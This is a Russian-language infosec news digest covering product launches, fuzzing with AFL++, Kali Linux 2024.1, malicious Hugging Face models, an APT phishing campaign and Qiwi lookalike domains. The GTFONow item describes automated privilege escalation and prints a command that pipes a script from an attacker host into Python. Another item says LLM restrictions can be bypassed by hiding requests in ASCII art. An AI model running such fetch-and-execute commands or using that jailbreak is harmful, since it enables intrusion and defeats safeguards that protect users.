Информационная безопасность *

Облачный файрвол Selectel вышел из беты ?

В течение полугода мы тестировали услугу, собирали вашу обратную связь и вносили улучшения. Оставили главное: облачный файрвол продолжает быть бесплатным и фильтровать весь IPv4-трафик. И добавили максимальную надежность для всех сетевых сценариев.

Облачный файрвол — это бесплатный классический stateful‑файрвол в облаке Selectel, который позволяет настроить сетевую безопасность в приватных сетях облака с доступом из интернета через публичные IP‑адреса.

Что умеет облачный файрвол

• Сохраняет состояния сессий (stateful).

• Фильтрует входящий или исходящий трафик приватной подсети, который проходит через облачный роутер.

• Фильтрует интернет‑трафик, идущий на публичные IP‑адреса.

• Открывает/закрывает определенные порты или диапазон портов.

• Разрешает/запрещает доступ с выбранных IP‑адресов или подсетей.

Облачный файрвол гибко адаптируется под ваши нагрузки, позволяя делегировать заботу о наличии необходимых ресурсов для его работы Selectel. Чтобы протестировать услугу и убедиться в этом самостоятельно, переходите по ссылке.

​​? 12 марта, 16:00 

? Бесплатный вебинар «Как не потерять бизнес в 2024? Основы информационной безопасности»

За 2023 год участились случаи взлома сервисов, хакерских атак, утечек персональных данных. Поговорим, как обеспечить безопасность инфраструктуры и не потерять данные клиентов. Рассмотрим, как готовиться к новым угрозам и эффективно им противодействовать.

Основные темы

? Аналитика атак за 2023 год

? DDoS, уязвимости на периметре, брутфорс

? Сетевая защита и защита инфраструктуры

Специальный бонус для 20 участников — бесплатное сканирование уязвимостей до 10 публичных адресов Selectel. Подробнее об условиях — на вебинаре.

Регистрируйтесь на митап, задавайте вопросы в форме и поучаствуйте в розыгрыше Тирекса ➡️

Основатель Telegram Павел Дуров прокомментировал с технической точки зрения ситуацию с глобальным сбоем в работе популярных соцсетей, мессенджерей и сервисов 5 марта 2024 года.

Миллионы людей регистрировались и делились контентом в Telegram за последний час, пока Instagram** и Facebook** не работали.

Интересно, что Telegram надёжнее этих сервисов — несмотря на то, что тратит на инфраструктуру в несколько раз меньше на одного пользователя.

У нас также примерно в 1000 раз (!) меньше штатных сотрудников, чем у Meta*, но нам удаётся запускать новые функции и внедрять инновации быстрее.

В течение 2023 года Telegram был недоступен всего 9 минут из 525 600 минут в году. Это 99,999983% времени безотказной работы.

<sub>Meta Platforms*, а также принадлежащие ей социальные сети Facebook** и Instagram**:
* — признана экстремистской организацией, её деятельность в России запрещена
** — запрещён в России</sub>

Вызывайте санитайзер! Фаззим исполняемые файлы при помощи AFL++ с санитайзерами

У нас вышел первый материал на Хакере, приятного чтения (если есть платная подписка).

Фаззинг, как ты, наверное, знаешь, — это техника, которая позволяет автоматизировать поиск уязвимостей в софте. Бывает фаззинг методом «черного ящика», когда у нас нет исходников программы, а бывает основанный на покрытии — то есть применяемый к исходникам. В этой статье сосредоточимся на втором виде и на примере AFL++ разберем, какую роль здесь играют санитайзеры и как их применять.

В этой статье идет речь о фаз­зинге прог­рамм. Нашим инс­тру­мен­том будет AFL++ — фаз­зер, ори­енти­рован­ный на пок­рытие. Это зна­чит, что он собира­ет информа­цию о пок­рытии для каж­дого изме­нен­ного вхо­да, что­бы обна­ружить новые пути выпол­нения и потен­циаль­ные ошиб­ки. Если у тебя есть исходник прог­раммы, AFL может встав­лять вызовы фун­кций в начало каж­дого базово­го бло­ка, нап­ример в фун­кции и цик­лы.

«Лаборатория Касперского» представила онлайн-игру «Интерак­тив­ный симулятор атаки программ‑вымогателей», симулирующую кибератаку на компанию с использованием программы-вымогателя.

Пользователю нужно в режиме реального времени принимать решения за ИБ-специалиста, чтобы противостоять злоумышленникам.

По сюжету игры главный герой выходит на работу в компанию среднего размера, занимающуюся продажей потребительской электроники. Приступив к своим обязанностям, он обнаруживает, что организацию пытаются атаковать злоумышленники. Далее перед ним встаёт выбор — сообщить о случившемся руководству или самостоятельно провести небольшое исследование. От дальнейших действий пользователя зависит, пострадает ли компания от программы-вымогателя и как именно завершится этот инцидент.

Состоялся выпуск Kali Linux 2024.1 с 4 новыми инструментами и обновленным пользовательским интерфейсом.

Разработчики проекта из Offensive Security также выпустили для новой сборки системы новые визуальные элементы, включая обои и обновления загрузочного меню и экрана входа в систему.

Помимо визуальных улучшений релиз Kali Linux 2024.1 получил версию ядра 6.6, в проект добавлены четыре новых ИБ-инструмента:

• blue-hydra — сервис для обнаружения Bluetooth-устройств;

• opentaxii — имплементация сервера TAXII от EclecticIQ;

• readpe — инструменты командной строки для работы с PE-файлами Windows;

• snort — гибкая система обнаружения сетевых вторжений.

Сегодня поговорим об инструменте GTFONow.

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:

• Автоматическая эксплуатация неправильно настроенных разрешений sudo.

• Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.

• Автоматическая эксплуатация неправильных настроенных компонентов ОС.

• Автоматическая эксплуатация через SSH‑ключи.

• Автоматическая эксплуатация через файл используемый в cron.

• Автоматическая эксплуатация через переменную окружения LD_PRELOAD.

• Легкий запуск без файлов с помощью

curl http://attackerhost/gtfonow.py | python

https://github.com/Frissi0n/GTFONow

Российский аналог «Википедии» под названием «Руниверсалис» сообщил Роскомнадзору, что ведомство должно заблокировать доступ к оригинальному ресурсу из-за наличия там страницы с руководством о том, «что делать, если "Википедия" заблокирована» (с рассказами о VPN и прочем).

В Госдуме пояснили СМИ, что «Википедию» могут заблокировать в России по новому закону о запрете популяризации VPN. Как сообщил зампред комитета Госдумы по информационной политике Антон Горелкин, необходимое для этого техническое решение уже разрабатывается сотрудниками РОЦИТ (Региональный общественный центр интернет-технологий).

«Законные основания для блокировки "Википедии" есть, осталось сделать так, чтобы это не вызвало резкого дискомфорта у пользователей», — сообщил Горелкин. По его словам, вся информация из онлайн-энциклопедии уже продублирована на портале БРЭ, «Рувики» и «Руниверсалисе». «Осталось сделать так, чтобы по ссылке на статью "Википедии" пользователю предлагалось открыть ее безопасный вариант на одном из российских аналогов. Необходимое для этого техническое решение уже разрабатывается экспертами РОЦИТ», — добавил Горелкин.

С 1 марта 2024 года в России вступил в силу запрет на популяризацию сервисов, позволяющих обходить блокировки в интернете. Доступ к материалам, популяризирующим подобные средства или рекламирующим средства обхода блокировок для доступа к запрещенному контенту, будет блокироваться Роскомнадзором.

Исследователи раскрыли хак, как убрать из ChatGPT цензуру и заставить ИИ отвечать без ограничений со стороны разработчиков. Оказалось. что для этого нужно просто замаскировать запрос под арт ASCII.

После этого ChatGPT может сообщить различные ранее запрещённые для раскрытия инструкции и заблокированную информацию. Этот баг есть во всех популярных нейросетях — GPT-3.5, GPT-4, Gemini, Claude и Llama2.

Группа компаний (ГК) «Солар» запустила сервис постоянного контроля защищённости внешнего IT‑периметра Solar CPT (Continuous Penetration Testing). Сервис находит критические уязвимости и недостатки меняющегося внешнего IT‑периметра. Найденные в ходе сканирования недостатки верифицируются экспертами анализа защищённости, после чего пользователь системы получает практические рекомендации по защите. В настоящее время ведутся пилотные проекты с организациями из IT‑отрасли и перерабатывающей промышленности.

По словам разработчиков, Solar CPT позволит регулярно актуализировать картину внешнего периметра и лучше защищать жизненно важную инфраструктуру от критичных угроз. Сервис учитывает многолетний опыт экспертов ГК «Солар» по анализу защищённости. Решение постоянно обновляется с учётом изменяющихся техник и тактик злоумышленников.

Как утверждает ГК «Солар», Solar CPT реализуется «под ключ». Эксперты по тестированию на проникновение собирают информацию об инфраструктуре, сканируют её средствами платформы, а затем вручную проверяют найденные уязвимости и недостатки, что помогает снизить число ложных срабатываний по сравнению с автоматическими сканерами.

Руководитель отдела анализа защищённости Solar JSOC ГК «Солар» Александр Колесов объяснил, что сервис Solar CPT представляет собой часть автоматизированных действий пентеста в сочетании с полноценной экспертизой специалистов.

Профильные сетевые эксперты предположили, что почти часовой сбой в работе различных мессенджеров и сервисов в Рунете 27 февраля мог произойти из-за массового тестирования похожей на Active Probing технологии, которая уже много лет успешно работает в Китае.

В своей заметке на ресурсе ntc.party пишет о сканировании и ValdikSS, приводя в пример VPN-сервис Windscribe. Примерно с середины января 2024 он обнаружил блокировки, срабатывающие после определённых действий на определённое время, только для IP-адреса, с которого они производились.

InSales запустила программу поиска уязвимостей на платформе BI.ZONE Bug Bounty. Программа охватывает сайт, тикет‑систему, мобильные приложения для iOS и Android inSales. inSales представляет собой платформу управления онлайн‑торговлей через сайт, на маркетплейсах, в социальных сетях и мессенджерах. Размер вознаграждения зависит от критичности обнаруженных уязвимостей (до ₽100 тысяч), рассказали информационной службе Хабра в пресс‑службе BI.ZONE.

По словам директора по информационной безопасности inSales Константина Липаткина, запуск программы на BI.ZONE Bug Bounty позволит укрепить защиту данных клиентов и выявить потенциальные угрозы во внешних сервисах, что позволит дополнить уже реализуемые меры по обеспечению надежности платформы.

Эксперты из JFrog выявили в репозитории Hugging Face вредоносные модели машинного обучения, установка которых может привести к выполнению кода атакующего для получения контроля за системой пользователя.

Проблема вызвана тем, что некоторые форматы распространения моделей допускают встраивание исполняемого кода, например, модели, использующие формат pickle, могут включать сериализированные объекты на языке Python, а также код, выполняемый при загрузке файла, а модели Tensorflow Keras могут исполнять код через Lambda Layer.

Для предотвращения распространения подобных вредоносных моделей в Hugging Face применяется сканирование на предмет подстановки сериализированного кода, но выявленные вредоносные модели показывают, что имеющиеся проверки можно обойти.

Кроме того, Hugging Face в большинстве случаев лишь помечает модели опасными, не блокирую к ним доступ.

Всего выявлено около 100 потенциально вредоносных моделей, 95% из которых предназначены для использования с фреймворком PyTorch, а 5% c Tensorflow.

Наиболее часто встречающимися вредоносными изменениями названы захват объекта, организация внешнего входа в систему (reverse shell), запуск приложений и запись в файл.

Источник: OpenNET.

Генеральный директор Palantir Алекс Карп заявил, что софт компании позволил предотвратить террористические атаки в Европе.

«При всей скромности, если их не остановить, то на Западе была бы совсем другая политическая реальность. И это просто факт», — отметил он.

Карп даже заявил, что Palantir «уберегла Европу от возвращения фашизма», и жители региона «должны сказать компании спасибо». 

Palantir привлекла первые инвестиции от подразделения венчурного капитала Центрального разведывательного управления США In-Q-Tel. Она получала контракты на оборонное и разведывательное применение своих технологий анализа данных в США. также компания сотрудничает с Иммиграционной и таможенной службой (ICE). 

Карп утверждает, что его компания «играет огромную роль в превосходстве США в технологиях». Однако, согласно оценкам, Palantir контролирует чуть менее 2% рынка анализа данных.

Специалисты BI.ZONE выяснили, что хакерская группировка Mysterious Werewolf перешла на собственные инструменты для атак. Чтобы атаки сложнее было распознать, злоумышленники используют для удалённого доступа вредоносную программу собственной разработки. Ранее группировка применяла легитимный инструмент с открытым исходным кодом.

Для проникновения в инфраструктуру жертв злоумышленники использовали фишинг и эксплуатировали уязвимость WinRAR CVE-2023–38 831. Хакеры рассылали от имени различных регуляторов письма с архивом. В архиве находился отвлекающий документ в виде официального письма и папка с вредоносным файлом в формате CMD. Если пользователь открывал заражённое письмо, WinRAR автоматически должен был исполнить вредоносный файл.

Далее на устройство жертвы устанавливался оригинальный бэкдор RingSpy. RingSpy представляет собой программу для удалённого доступа, позволяющую злоумышленникам выполнять команды на скомпрометированном компьютере и скачивать данные. Для управления бэкдором используется бот в Telegram.

По словам руководителя BI.ZONE Threat Intelligence Олега Скулкина, в ноябре 2023 года группировка Mysterious Werewolf использовала озвученную схему для атак на российские промышленные компании. Однако в конце осени 2023 года для удалённого доступа злоумышленники применяли агент Athena фреймворка Mythic, представляющий собой легитимный инструмент для тестирования на проникновение.

«Лаборатория Касперского» рассказала, что решения ИБ‑компании для конечных пользователей обнаружили и заблокировали 126 миллионов киберугроз на устройствах российских пользователей в 2023 году. Доля российских пользователей, потенциально попадающих под эти атаки, составляет 45,43%. Такие данные эксперты компании представили на Kaspersky CyberSecurity Weekend в Малайзии.

Также эксперты «Лаборатории Касперского» отмечают рост числа и уровня сложности целевых атак программ‑вымогателей. За 2023 год количество кибергрупп, проводящих целевые атаки с использованием программ‑вымогателей, увеличилось в мире на 30%, а число их жертв — на 70% по сравнению с 2022 годом. За озвученный период хакеры‑вымогатели получили платежей на сумму $1 млрд.

Состоялся релиз проекта FreeRDP 3.3.0, предлагающего свободную реализацию протокола удалённого доступа к рабочему столу RDP (Remote Desktop Protocol), развиваемую на основе спецификаций Microsoft.

Проект предоставляет библиотеку для интеграции поддержки RDP в сторонние приложения и клиент, который может применяться для удалённого подключения к рабочему столу Windows. Код проекта распространяется под лицензией Apache 2.0.

В версии FreeRDP 3.3.0:

• добавлены новые сборочные опции (для CMake):

  • WINPR_UTILS_IMAGE_PNG — включает поддержку PNG через libpng.

  • WITH_LODEPNG — включает поддержку PNG через lodepng.

  • WINPR_UTILS_IMAGE_WEBP — включает поддержку WEBP.

  • WINPR_UTILS_IMAGE_JPEG — включает поддержку JPEG.

  • USE_EXECINFO — управляет выводом трассировок стека через execinfo.

  • WITH_WEBVIEW — включает сборку c WebView, отключённую по умолчанию в Windows, macOS и Android.

  • PLUGIN_ABS_PATHS_DEFAULT — задаёт путь по умолчанию к каталогу с плагинами.

• в интерфейсах xfreerdp и wlfreerdp добавлена поддержка передачи изображений в форматах JPG/JPEG, PNG, GIF, ICO и WEBP через буфер обмена;

• улучшена реализация клиента на базе библиотеки SDL. Добавлена поддержка настройки горячих клавиш;

• загрузка плагинов разрешена только при указании абсолютных путей;

• улучшен выбор алгоритмов для TLS-соединений;

• добавлена поддержка атрибута WINPR_ATTR_MALLOC (malloc wrapper) для GCC и Clang;

• реализован блокирующий режим работы.

Источник: OpenNET.

Росстандарт утвердил спецификацию протокола защищенного обмена для индустриальных систем ГОСТ Р 71 252–2024 «Информационная технология. Криптографическая защита информации. Протокол защищенного обмена для индустриальных систем». Новый национальный стандарт разработан компанией «ИнфоТеКС», внесен Техническим комитетом по стандартизации ТК 26 «Криптографическая зашита информации». Стандарт вступает в силу с 1 апреля 2024 года взамен рекомендаций по стандартизации Р 1 323 565.1.029–2019. Данный документ стал первым национальным стандартом РФ, описывающим криптографический протокол.

CRISP (CRyptographic Industrial Security Protocol) — неинтерактивный протокол защищенной передачи данных, разработанный для применения в индустриальных системах. Разработка протокола велась специально для индустриальных систем, чтобы обеспечить передачу компактных блоков промышленных данных и отказаться от достаточно высоких требований к вычислительным мощностям и каналам связи, которые предъявляются при использовании протоколов на основе CMS (Cryptograghic Message Syntax).

Протокол CRISP позволяет защищать данные, передаваемые как в TCP\IP‑сетях, так и в сетях узкополосной передачи LPWAN. Применять новый национальный стандарт можно в качестве слоя защиты для протокола LoRaWAN RU (ГОСТ Р 71 168–2023), NB‑IoT, ZigBee, XNB, а также для ряда промышленных протоколов в АСУ ТП и в IIoT‑системах.

Эксперты по ИБ зафиксировали с утра 21 февраля 2024 года массовую регистрацию злоумышленниками доменов с похожими на Qiwi названиями.

По данным Angara Security, многие сайты зарегистрированы или обновлены именно 21 февраля. Уже на 14:00 мск было зарегистрировано более 200 доменов в сегментах .com, .ru, .org, .net, .de, .cn, .ltd с названиями qewi, qi-wi, qi7i, qivi и т. д. До сегодняшнего дня было выявлено 667 сайтов, помимо официальных, которые используют нейминг Qiwi, уточняют эксперты по ИБ.

В Angara Security отмечают несколько сценариев использования этих доменных имен, которые в большинстве представляют собой пустые страницы, площадки для переадресации на другие сайты (например, мошеннические агрегаторы) либо киберсквоттинг для дальнейшей перепродажи. 

«Сейчас есть проблемы с выводом денежных средств с QIWI-кошелька. Мошенники могут оперировать этой повесткой — на зарегистрированных доменах разместить копию сайта QIWI и предлагать помощь для вывода средств», — отмечают в Angara Security. Если пользователи случайно воспользуются фишинговым сайтом, есть риск передать злоумышленникам свои учетные данные от кошелька и лишиться денежных средств, предупредили пользователей в ИБ-компании.

21 февраля Банк России объявил об отзыве лицензии на осуществление операций у «Киви банка». Регулятор заявил, что Qiwi-банк нарушил Федеральный закон «О банках и банковской деятельности». После отзыва лицензии у банка пополнение Qiwi-кошельков и вывод с них денег заблокировали.

Компания «РуПост» (входит в «Группу Астра») объявила о выпуске на российский рынок системы управления мобильными устройствами WorksPad MDM (Mobile Device Management).

Это решение включено в состав платформы WorksPad EMM (Enterprise Mobile Management), которая обеспечивает централизованное управление и защиту обрабатываемых удалёнными сотрудниками данных за счёт установки на используемые ими портативные Android- и iOS-устройства контролируемого организацией приложения-контейнера с настраиваемыми инструментами для работы, политиками безопасности и шифрования передаваемой по сети информации.

При этом клиентская программа не контролирует приватные данные владельца устройства и никак на них не влияет.

Решение WorksPad MDM позволяет заменить иностранные EMM-платформы, организовать работу на планшетах, портативных телефонах и других подобных устройствах, включая как защищенные мобильные рабочие места, так и централизованное управление мобильными устройствами на iOS и Android. Этот проект позволяет администрировать подключенные к Mobile Device устройства внутри одной сети, настраивать и обновлять ПО, а также удалять информацию в случае потери или кражи мобильного устройства.